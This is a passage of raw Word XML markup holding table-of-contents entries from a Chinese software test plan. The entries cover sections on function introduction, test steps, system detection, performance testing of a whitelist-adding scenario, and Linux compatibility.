          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630332" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>15.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>功能介绍</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630332 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D24E8DE" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630333" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>15.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试步骤</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630333 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C064AD6" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630334" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>16.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>系统检测测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630334 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>78</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7871EACD" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630335" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>16.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>功能介绍</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630335 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>78</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4549AC5D" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630336" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>16.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试步骤</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630336 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>78</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36664939" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630337" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>17.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>性能测试方案</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630337 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D13D698" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630338" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>17.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>场景名称：添加白名单</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630338 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D1C3240" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630339" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>17.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>场景概述</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630339 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DC0A175" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630340" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>17.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>执行策略设计</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630340 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71FEE808" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630341" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>17.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试数据需求</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630341 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B1875A3" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630342" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>17.5.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>性能测试结果分析方法和预期</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630342 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>88</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5465DC6F" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630343" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>18.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>兼容性测试方案</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630343 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62C66F94" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630344" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>18.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>场景名称：</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Linux</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>系统支持</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630344 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
